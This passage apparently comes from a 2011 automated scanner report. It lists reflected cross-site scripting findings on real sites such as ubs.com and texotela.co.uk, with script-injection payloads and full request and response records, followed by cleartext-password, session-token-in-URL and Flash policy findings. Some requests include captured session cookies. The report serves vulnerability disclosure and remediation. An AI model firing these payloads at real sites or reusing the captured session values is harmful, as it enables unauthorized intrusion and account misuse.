<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: </title>
<style type="te
...[SNIP]...
<strong>/?4a571<script>alert(1)</script>9d4dfafd95d=1</strong>
...[SNIP]...

2.58. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f60af<script>alert(1)</script>3c6dcac904f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /codef60af<script>alert(1)</script>3c6dcac904f/jquery/newsticker/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:52 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: Page Not Found</title>
<
...[SNIP]...
<strong>/codef60af<script>alert(1)</script>3c6dcac904f/jquery/newsticker/</strong>
...[SNIP]...

2.59. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3dd58<script>alert(1)</script>3809ac80451 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code/jquery3dd58<script>alert(1)</script>3809ac80451/newsticker/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:52 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: Page Not Found</title>
<
...[SNIP]...
<strong>/code/jquery3dd58<script>alert(1)</script>3809ac80451/newsticker/</strong>
...[SNIP]...

2.60. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1b42b<script>alert(1)</script>d88ca01f5d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code/jquery/newsticker1b42b<script>alert(1)</script>d88ca01f5d9/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:52 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: Page Not Found</title>
<
...[SNIP]...
<strong>/code/jquery/newsticker1b42b<script>alert(1)</script>d88ca01f5d9/</strong>
...[SNIP]...

2.61. http://www.texotela.co.uk/code/jquery/newsticker/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2c10<script>alert(1)</script>82844efb4b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code/jquery/newsticker/?b2c10<script>alert(1)</script>82844efb4b8=1 HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5903
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: jQuery - newsticker</tit
...[SNIP]...
<strong>/code/jquery/newsticker/?b2c10<script>alert(1)</script>82844efb4b8=1</strong>
...[SNIP]...

2.62. https://wb1.ubs.com/cache/fin/pub/gvu/quotes/markets_instruments [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wb1.ubs.com
Path:   /cache/fin/pub/gvu/quotes/markets_instruments

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db38f'style%3d'x%3aexpression(alert(1))'fac0e5ec6df was submitted in the REST URL parameter 6. This input was echoed as db38f'style='x:expression(alert(1))'fac0e5ec6df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cache/fin/pub/gvu/quotes/markets_instrumentsdb38f'style%3d'x%3aexpression(alert(1))'fac0e5ec6df HTTP/1.1
Host: wb1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://quotes-public.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_midb38f'style='x:expression(alert(1))'fac0e5ec6df
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 349
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://quotes-public.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_midb38f'style='x:expression(alert(1))'fac0e5ec6df'>
...[SNIP]...

2.63. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c20a'style%3d'x%3aexpression(alert(1))'5ef3e2c84d5 was submitted in the REST URL parameter 3. This input was echoed as 5c20a'style='x:expression(alert(1))'5ef3e2c84d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /1/ssl/e5c20a'style%3d'x%3aexpression(alert(1))'5ef3e2c84d5/contact/contact.html HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:54:07 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://www2.ubs.com:443/1/ssl/e5c20a'style='x:expression(alert(1))'5ef3e2c84d5/contact/contact.html
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 333
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://www2.ubs.com:443/1/ssl/e5c20a'style='x:expression(alert(1))'5ef3e2c84d5/contact/contact.html'>
...[SNIP]...

2.64. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baef1'style%3d'x%3aexpression(alert(1))'5a105d5b3ce was submitted in the REST URL parameter 4. This input was echoed as baef1'style='x:expression(alert(1))'5a105d5b3ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /1/ssl/e/contactbaef1'style%3d'x%3aexpression(alert(1))'5a105d5b3ce/contact.html HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:54:14 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://www2.ubs.com:443/1/ssl/e/contactbaef1'style='x:expression(alert(1))'5a105d5b3ce/contact.html
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 333
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://www2.ubs.com:443/1/ssl/e/contactbaef1'style='x:expression(alert(1))'5a105d5b3ce/contact.html'>
...[SNIP]...

2.65. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4121f'style%3d'x%3aexpression(alert(1))'8f137a403b6 was submitted in the REST URL parameter 5. This input was echoed as 4121f'style='x:expression(alert(1))'8f137a403b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /1/ssl/e/contact/contact.html4121f'style%3d'x%3aexpression(alert(1))'8f137a403b6 HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:54:21 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://www2.ubs.com:443/1/ssl/e/contact/contact.html4121f'style='x:expression(alert(1))'8f137a403b6
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 333
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://www2.ubs.com:443/1/ssl/e/contact/contact.html4121f'style='x:expression(alert(1))'8f137a403b6'>
...[SNIP]...

3. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://twitter.com/intent/session

Summary

Severity:   High
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
<div id="bd" role="main">

<form action="/intent/session" id="login-form" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label>
<input aria-required="true" class="password" id="password" name="session[password]" required="required" type="password" value="" />
</div>
...[SNIP]...

3.2. http://www.sipc.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

3.3. http://www.stumbleupon.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10210
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</a>
               <form action="/login.php" name="formLogin" method="post" id="formLogin">                    
                   <ul>
...[SNIP]...
</label>
                           <input class="text" type="password" id="passwordHeader" name="password" maxlength="16" />
                           <input class="text hidden" type="text" value="Password" tabindex="0" name="dummyPassword" id="switch" />
...[SNIP]...

3.4. http://www.stumbleupon.com/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login.php HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9553
Date: Wed, 06 Jul 2011 11:21:20 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</h1>
                               <form method="post" name="formLogin" action="http://www.stumbleupon.com/login.php" id="loginForm">
                   <fieldset class=" labelLeft">
...[SNIP]...
<div class="iefix">
                               <input class="text" type="password" name="password" value="" maxlength="16" id="password" />
                               <a href="http://www.stumbleupon.com/reset_password/">
...[SNIP]...

4. Session token in URL
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=105884726134656&app_id=105884726134656&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df313020f9c%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143104ab8%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24aa56e24%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fffad37%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c7a69384%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.45
X-Cnection: close
Date: Wed, 06 Jul 2011 11:22:08 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f1fffad37&origin=http\u00253A\u00252F\u00252Fwww.bebo.com\u00252Ff2847a9e74&relation=parent&transport=postmessage&frame=f2035863b4", "http:\/\/ww
...[SNIP]...

4.2. http://www.softlayer.com/about/contact-us/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<td><a
id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;">
Click to Chat Now</a>
...[SNIP]...

5. Flash cross-domain policy
There are 3 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


